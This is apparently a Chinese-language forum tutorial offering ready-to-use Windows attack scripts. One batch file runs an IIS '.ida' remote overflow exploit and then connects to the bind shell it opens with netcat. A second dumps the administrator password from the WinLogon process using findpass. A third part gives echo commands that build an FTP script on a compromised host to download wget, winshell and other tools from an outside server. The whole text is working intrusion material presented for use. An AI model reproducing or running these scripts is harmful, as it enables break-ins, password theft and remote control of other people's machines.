下面我们以具体的一个idahack程序就是ida远程溢出为例子.应该是很简单的. 

___________________ida.bat_________________________________________________ 
@rem ver 1.0 
@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe" 
@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe" 

@if "%1" =="" goto USAGE 
@if NOT "%2" =="" goto SP2 

:start 
@echo Now start ... 
@ping %1 
@echo chinese win2k:1 sp1:2 sp2:3 
idahack.exe %1 80 1 99 >%temp%\_tmp 
@echo "prog exit code [%errorlevel%] idahack.exe" 
@type %temp%\_tmp 
@find "good luck :)" %temp%\_tmp 
@echo "prog exit code [%errorlevel%] find [goog luck]" 
@if NOT errorlevel 1 nc.exe %1 99 
@goto END 

:SP2 
@idahack.exe %1 80 %2 99 %temp%\_tmp 
@type %temp%\_tmp 
@find "good luck :)" %temp%\_tmp 
@if NOT errorlevel 1 nc.exe %1 99 
@goto END 

:USAGE 
@echo Example: ida.bat IP 
@echo Example: ida.bat IP (2,3) 

:END 
_____________________ida.bat__END_________________________________ 

下面我们再来第二个文件.就是得到administrator的口令. 
大多数人说得不到.其实是自己的没有输入正确的信息. 

___________________________fpass.bat____________________________________________ 
@rem ver 1.0 
@if NOT exist %windir%\system32\findpass.exe echo "ERROR: dont find findpass.exe" 
@if NOT exist %windir%\system32\pulist.exe echo "ERROR: dont find pulist.exe" 

@echo start.... 
@echo ____________________________________ 
@if "%1"=="" goto USAGE 
@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt 
@echo "prog exit code [%errorlevel%] findpass.exe" 
@type %temp%\_findpass.txt 
@echo ________________________________Here__pass★★★★★★★★ 
@ipconfig /all >>%temp%\_findpass.txt 
@goto END 

:USAGE 
@pulist.exe >%temp%\_pass.txt 
@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt 
@echo "Example: fpass.bat %1 %2 %3 %4 !!!" 
@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon" 

:END 
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator " 
@echo " fpass.bat end [%errorlevel%] !" 
_________________fpass.bat___END___________________________________________________________ 

还有一个就是已经通过telnet登陆了一个远程主机.怎样上传文件(win) 
依次在窗口输入下面的东西. 当然了也可以全部拷贝.Ctrl+V过去. 然后就等待吧!! 

echo open 210.64.x.4 3396>w 
echo read>>w 
echo read>>w 
echo cd winnt>>w 
echo binary>>w 
echo pwd >>w 
echo get wget.exe >>w 
echo get winshell.exe >>w 
echo get any.exe >>w 
echo quit >>w 
ftp -s:w